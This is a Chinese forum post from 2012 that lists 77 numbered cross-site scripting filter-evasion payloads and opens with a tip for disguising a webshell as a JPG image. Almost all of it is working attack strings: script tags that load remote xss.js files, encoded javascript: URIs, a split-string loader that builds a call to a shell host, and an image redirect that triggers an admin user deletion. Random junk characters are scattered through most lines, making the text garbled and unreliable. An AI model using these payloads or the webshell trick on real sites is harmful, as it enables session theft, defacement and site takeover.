跨站图片shell( n, d# c% e* h- ]) j' _0 H" |- i
XSS跨站代码 <script>alert("")</script>
/ B* } \+ v; v$ [/ p$ J, A
/ I0 _9 t( {; K# a$ @& I将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
) N/ w+ j/ S8 _) q, n
; L5 Y: F) K6 y; p' E7 e' x d4 x# j: {
2 C7 o! y+ F9 y: \( n3 \/ B
1)普通的XSS JavaScript注入
& d9 h4 |: |# B<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ h- O: z4 M; u# K5 ~) h2 X
' S% i5 c3 ~+ E# g" ?; x6 }' C m
(2)IMG标签XSS使用JavaScript命令4 h% h& |. e# [, y3 z' O
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ [7 J; h7 \0 U+ d9 B; G7 W, I
0 X9 \0 K- T9 g0 W! @, w
(3)IMG标签无分号无引号% C- |, h- e6 V" l0 f7 \
<IMG SRC=javascript:alert(‘XSS’)>
. T# R; k8 h' Z* }$ N) D
- @/ d1 M+ G- ^- V, T5 c6 }4 y(4)IMG标签大小写不敏感
5 ?8 V9 p& ~1 {4 f/ R5 H" W% m<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) n2 X) W% G1 c1 M$ I, R
X! f% B1 H2 C0 N& v7 z( C9 r- U. m(5)HTML编码(必须有分号)
+ C P# d" v& B& k; N7 J<IMG SRC=javascript:alert(“XSS”)>' b. X. d- Q( L7 v
5 k, n( x2 N& A- i: x+ W(6)修正缺陷IMG标签 s9 n) w: L U
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 V j9 k# ]4 O' a" A$ P: t! h1 E
9 o. f J+ w3 K2 m(7)formCharCode标签(计算器)+ B4 q i* b( |+ b
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- b! V [$ P' t: m+ U( {3 [/ H! Z1 ], U# h
(8)UTF-8的Unicode编码(计算器)
. s8 P! E8 H+ z- B* }. g<IMG SRC=jav..省略..S')>
) Y8 d0 e0 f+ b/ ?9 G( i2 S% \2 x% T3 A2 |
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, w& X) u7 ^& r8 v f* T<IMG SRC=jav..省略..S')>
4 @5 N T; r5 x. U$ L
% P/ z- @: r# e/ u, j(10)十六进制编码也是没有分号(计算器)
9 N( x4 D: t) k5 W1 E<IMG SRC=java..省略..XSS')>
6 `$ s5 j3 X5 e+ F8 a0 T3 ?& y) l( |6 o0 D r0 j1 G$ a; n, t
(11)嵌入式标签,将Javascript分开
# C |/ j8 }% P6 P D8 |<IMG SRC=”jav ascript:alert(‘XSS’);”>9 P3 N7 k" |% V x
# ?0 V4 q% \6 Y+ _& m(12)嵌入式编码标签,将Javascript分开
8 K* v V1 N1 f7 x- B" G. k/ A, G$ u5 z<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 S+ _) r# x% W2 b) q6 Q$ b' H% e( V0 I, s7 W$ |$ ~
(13)嵌入式换行符
1 f3 b9 m, ?) y; n6 `* w) k$ U* H$ ]6 J<IMG SRC=”jav ascript:alert(‘XSS’);”>
' C2 O/ H: e7 v7 f+ ]0 S
5 v% D- H: S$ ]& q' b(14)嵌入式回车" M; v; R O+ C+ E. R
<IMG SRC=”jav ascript:alert(‘XSS’);”>+ E; o3 e3 G1 d0 J# a. B& s8 N
6 A/ m" N5 @9 y0 A+ j/ i. }
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
8 n8 K! M: H) P5 b2 c<IMG SRC=”javascript:alert(‘XSS‘)”>8 V% O' o1 o% ^" m. T1 z
: c6 f: u$ A4 p& c& N
(16)解决限制字符(要求同页面)- M8 ~& [* N# w4 O+ P
<script>z=’document.’</script>
7 Z( ^" C2 ~% b1 H' }3 v<script>z=z+’write(“‘</script>8 T" f( X) L \+ z' [9 y u
<script>z=z+’<script’</script>1 _+ i- o+ D! X* k
<script>z=z+’ src=ht’</script>4 x* k1 R1 Q- U
<script>z=z+’tp://ww’</script>: r' ]2 m/ x4 s
<script>z=z+’w.shell’</script>1 v, m( L& o% e0 A; u
<script>z=z+’.net/1.’</script>
! f% a; j+ h+ ?- ^+ t<script>z=z+’js></sc’</script>
C. [' o$ `" B1 r+ A<script>z=z+’ript>”)’</script>
! N0 s, B5 S% a* L$ v5 F( b5 `<script>eval_r(z)</script>; l V6 n( N! E) }# F% t' ~
' E* ], ]* J4 L. k6 o: z) n5 ](17)空字符
' N+ z# X$ r R$ J3 G @perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out- o6 U/ o: m' @: ~% u
7 h9 Y; {+ i# D0 M8 e8 }
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 m/ X$ Q, c& W9 Q9 cperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out. w. p4 W/ j! D" o7 {; q
' a3 L, @2 H; Y) w) A9 }/ ?
(19)Spaces和meta前的IMG标签7 X0 J* w4 u0 B& W( F
<IMG SRC=” javascript:alert(‘XSS’);”>/ k3 j1 }9 |# H4 Y& b
5 `- Z1 [+ C6 J6 K
(20)Non-alpha-non-digit XSS) w+ K1 n8 L7 o
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 `2 c$ F: i0 I, V+ I/ S
- a3 F! Y/ x \) e(21)Non-alpha-non-digit XSS to 2
4 i0 |' p2 \! t# \) ~- D; o7 a<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 K. m7 z. s( B, ^9 O$ s! {8 b2 l! I$ D
(22)Non-alpha-non-digit XSS to 3
9 x, ]0 o/ B1 M; _1 [ ~, y8 p<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 H' }; @7 X# P, Y V
% x6 S7 \) s0 m. c
(23)双开括号$ N% X$ u4 i5 M) c+ [; y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
* |; V8 _& y3 ^2 [ @; U: b, r
: O7 D f4 I9 G+ f0 a(24)无结束脚本标记(仅火狐等浏览器)% w& [" a$ n( B4 E
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* f( Q) J! F5 a4 p) K- M; u8 b
' {9 Y) v* u; a' H4 i0 J! c( N
(25)无结束脚本标记2/ S. B3 p9 N% j5 P& O$ f" U3 O! d
<SCRIPT SRC=//3w.org/XSS/xss.js>: S) d" D; P ]+ Z' c- `
" ?- d" p, W( h( p5 U( m1 D% z1 c; _(26)半开的HTML/JavaScript XSS/ k7 U. `0 {2 ^; I- k) H
<IMG SRC=”javascript:alert(‘XSS’)”
9 I4 r& z/ e( N ^6 F
( l8 |+ p/ n! z8 h0 W(27)双开角括号
& d3 _; m! r- z3 Z* A<iframe src=http://3w.org/XSS.html <
% M! ]( G0 w3 Y& x" ]. Y2 Z2 }8 n# Q* D8 @ M2 {. m* B
(28)无单引号 双引号 分号5 y5 f8 }8 W* d6 A
<SCRIPT>a=/XSS/
$ Q3 N; ]9 v7 h7 i* `8 V6 Xalert(a.source)</SCRIPT>
: y) E, l( w ?* U4 _* L' m) ? S3 W5 Q
(29)换码过滤的JavaScript4 s" B7 z/ a: h+ w* n. w) A, D: E
\”;alert(‘XSS’);//' E7 G9 } R; q6 h: H% V6 Z
F7 _* |0 q7 `/ {& R, D S(30)结束Title标签9 H# ^5 l$ _7 y* u/ `4 _/ g
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 I4 k8 T- k5 F+ t' c
g+ {6 B# @( [9 O+ U(31)Input Image
: L5 z$ r6 N$ Y1 E7 F<INPUT SRC=”javascript:alert(‘XSS’);”>
& e B" m: }. u- E, C; E. J8 @
% S8 [9 a! E f; c3 Z3 S: Q(32)BODY Image
5 d/ C! v" v8 Y5 @<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- C U- |, C5 C) X, [) h' Y1 u) t" Q6 U( k
(33)BODY标签% h8 D1 Y2 \: h. l9 E2 d
<BODY(‘XSS’)>
$ K1 W4 U6 z2 F& ?) e
) q D6 t* r" `/ U6 W8 J(34)IMG Dynsrc6 ~. Z3 i' k' t8 L
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
. m5 E, W; {5 p6 i, C" h* H4 I! J0 u; D5 p
(35)IMG Lowsrc8 d4 ^7 v# V/ }0 c( d' k/ F
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
! G; g ^& l& O( h+ R+ K; ^( T$ C- l
(36)BGSOUND3 l2 b# `0 F4 P- v. i3 }0 K
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
1 \1 z, C% {) P' R& P: X+ a5 t, \; k' b2 j5 e+ x
(37)STYLE sheet
: w2 `% t0 B, R2 [7 D<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>" B+ r7 H d! X0 e6 W6 _
) b% X2 _" P5 _1 M0 Y1 ~) w6 y(38)远程样式表
4 Z" h& F4 L5 z5 I, |) g<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 B1 {8 w) b% {* |( Z# P
3 L- u% \# s: L1 J(39)List-style-image(列表式)
% H( Q2 I- S& g# e( r% D<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) _( P& w- l4 a4 R, q
7 B7 ?+ v) \' y& f4 V5 j(40)IMG VBscript1 R1 R5 Z3 F0 u! r4 O
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS2 @$ \+ X u# O% L8 H% G2 [9 Q
6 p' T4 S ]3 C" D: a" u$ U+ z$ U/ b(41)META链接url
! E! ]& @5 Z3 H3 ?/ g6 z<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
! e# ^3 [5 x# h5 c
N. W- T# p' m- j$ p/ b(42)Iframe( n) i1 H! u: O: M
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 R8 X. D$ ^5 ~& K(43)Frame: ?6 X9 G, o9 J5 q
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- S7 L. Z6 f; Z+ v5 |- A+ z4 m$ n; `9 c5 O/ b- H% a! ?! |
(44)Table9 [5 r/ R; ?7 ]- b% d& ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& N) q) ?' h4 f
9 `- b9 I5 s; J' |(45)TD
! A# [1 \' [) l% S9 M3 Y& Z<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 e0 K) [; |$ h$ Z2 I8 o2 B4 t
! J, E$ L, ~3 a; b(46)DIV background-image
& P& e+ O3 F7 r2 P6 e' s. B<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: W7 d% c- P( u5 R. ~4 V4 j
0 f0 Z- a' S1 W% g0 T( y
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- x$ j) v6 m& D1 e* N
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
/ I* _* P# B9 b2 _8 @
) u' Z. z; S8 [1 }5 R# T(48)DIV expression
6 ]3 M5 x5 d- B! p V<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 e# s( Z6 a# ?7 \! Z
: S9 c# p( s. W" I(49)STYLE属性分拆表达
% {: [9 M% J' N) l+ \$ I<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>8 `; x& X/ A7 l7 Q& g1 W5 s0 }
& {, ^, L. ?2 }' J0 e
(50)匿名STYLE(组成:开角号和一个字母开头); H4 A) n/ z8 y( X# \- F" b
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' n" ]& N( {' J) X5 F% l7 l# _
1 G& g q. @) C) C4 b
(51)STYLE background-image8 E5 L3 {. w" I V' e
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>0 L( @+ O4 F8 T8 w, L
! N* I' u; L) Q2 L
(52)IMG STYLE方式
( z6 x2 [9 H5 I; |, L# ?8 V0 rexppression(alert(“XSS”))’># {* g3 k7 r/ R+ Q' _/ [' g
' A: f; x5 j# ]
(53)STYLE background
- S! w7 ?8 \' X<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* f. { F% e5 [# C& Q7 `0 q# _9 |; j- @+ s" y9 y" J9 ~+ W
(54)BASE) A& v5 `3 J) M5 b% R
<BASE HREF=”javascript:alert(‘XSS’);//”>9 o. _" d1 A1 `% `$ F$ [
. X6 Y! I2 N2 t1 a& U7 d; y" ]: V) i(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS7 t% o7 S6 _" S. X" C) u
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 j9 M( \+ X* G7 A; O! }# T- [! C/ `# C% {* k* W% `( ?
(56)在flash中使用ActionScrpt可以混进你XSS的代码7 Q2 I. l% Z1 h1 S$ C
a=”get”;# Q$ P6 `5 f6 A- @/ J- z
b=”URL(\”";
' e# B+ L: O' G4 K3 X% D/ _4 Uc=”javascript:”;
; B4 V' w/ E8 N9 `) @- @) |d=”alert(‘XSS’);\”)”;
3 V, H. E' W" z; aeval_r(a+b+c+d);, a$ ~" E. f. m( J, j1 A( |* l
! D6 E+ D8 f" g4 w; ? ^# \
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 u- N0 `' W% b1 T, o/ e/ s# T<HTML xmlns:xss>: O9 p3 m8 W' ?5 w( l" m0 G7 |# a
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>) K- t0 s) x- E5 _" S
<xss:xss>XSS</xss:xss>) }+ [' F, Q4 w1 {$ n8 F
</HTML># \9 W5 b5 w P/ q$ e
9 f5 c. K' c4 J) V% W5 j/ N! X4 Q(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, ^- J. a) k) p) K, j V<SCRIPT SRC=””></SCRIPT>
`9 X H6 ?/ J }/ {8 L. f- W, |7 p" u' F0 e8 F' \
(59)IMG嵌入式命令,可执行任意命令, t* h, _) \/ B0 R
<IMG SRC=”http://www.XXX.com/a.php?a=b”>0 C- t8 u4 B! A" m T
# u; n' S' P. P! J# u) U% Z) o
(60)IMG嵌入式命令(a.jpg在同服务器)
9 A2 N2 G: Q: w) P( e0 oRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
% ?- S0 |8 q& F9 K( F) F
% U# D }2 r9 a! _; @# }(61)绕符号过滤# ^, c$ C- @6 W# G% j- E
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ M5 t" P2 w$ F" ^3 {" O. N8 Y( S1 \7 v: l
(62)# x3 h- \- Q6 I& j: t. t1 S8 m" g
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: R7 R- d8 z9 V$ Y4 z% D
# l! y3 T7 L" v$ M(63)
' r; ~ j7 |5 K# Q4 F<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& G& S% K# C$ B0 d& U
8 z. u3 S( k) b# q(64)0 ~1 L, I" U4 J- d5 M
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
& r0 }) [+ n5 ?
' s' Y6 B1 q" ]0 r' {. H(65)+ e$ z. R2 ?- }9 Y5 b* B/ z
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( Z6 u" s U {; |, \9 v
/ K: |& M+ [; d4 }+ l+ u9 l3 v(66)
- s* B# T7 _7 ~ l* Y w7 ?<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
! ^4 w. N, ]% q: q2 \, }
) ^* e8 w* }1 p3 {8 \* I# G8 G(67)
! y$ ~- i0 z* n: H0 I& v<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>5 I3 @" Q* T& H( B; `! P
2 F& n1 F6 ]. [% F, W(68)URL绕行
* J3 ~5 p9 @+ z4 E* Y1 L) m5 A<A HREF=”http://127.0.0.1/”>XSS</A>
8 b1 G# f8 d% ?! \8 I4 Z8 I) v7 s5 b A: u5 Y2 D/ S7 Q9 i
(69)URL编码2 n; S6 ?3 x1 a. ` l4 x5 f5 y* h
<A HREF=”http://3w.org”>XSS</A>6 G6 v _6 T; }' ?' C
8 W0 L$ F$ K, n
(70)IP十进制
4 J3 m; Q* }( t8 A<A HREF=”http://3232235521″>XSS</A>
2 J/ E: F7 e! c: j! @, H' y
) j3 m$ V3 `& ]1 y+ j3 E(71)IP十六进制
- c3 M0 L. L/ ]4 x t<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
3 @4 Y+ v. b6 F2 f+ \5 m m
4 q \5 L h/ s) E! Q9 B2 o(72)IP八进制, P+ ~ C6 ^' W* \# Q* c$ L
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
0 I% X* e( d& C8 s% Z( i
! J" U: O' E7 }4 s(73)混合编码* p* {* |$ i0 Z6 D9 V! ?% c
<A HREF=”h& y* F7 S: o7 f3 v
tt p://6 6.000146.0×7.147/”">XSS</A>. V- ^8 h& I9 `% Q" V/ h2 W5 P
2 G! j6 ^0 {: M& P H(74)节省[http:]
: ^2 @' c' f4 g% s. z3 @<A HREF=”//www.google.com/”>XSS</A>
1 I( t) _& f# L" d# w! V4 c8 Y. [! v/ @( |
(75)节省[www]! |( v6 T( q n
<A HREF=”http://google.com/”>XSS</A>
@3 d0 C- P0 q6 p. ^1 N& o( j& t! G; C. v
(76)绝对点绝对DNS
( ?! Q! H! }, c# e' P5 P ?# p<A HREF=”http://www.google.com./”>XSS</A>6 }- V. B1 n7 z/ P5 Y7 X
6 t y& z6 |1 N8 B# p
(77)javascript链接
/ S4 `. e- F, D$ J" y" D<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
+ E i/ T# y1 |0 G2 u5 l* P |
发表于 2012-9-13 17:04:56
收藏
支持
反对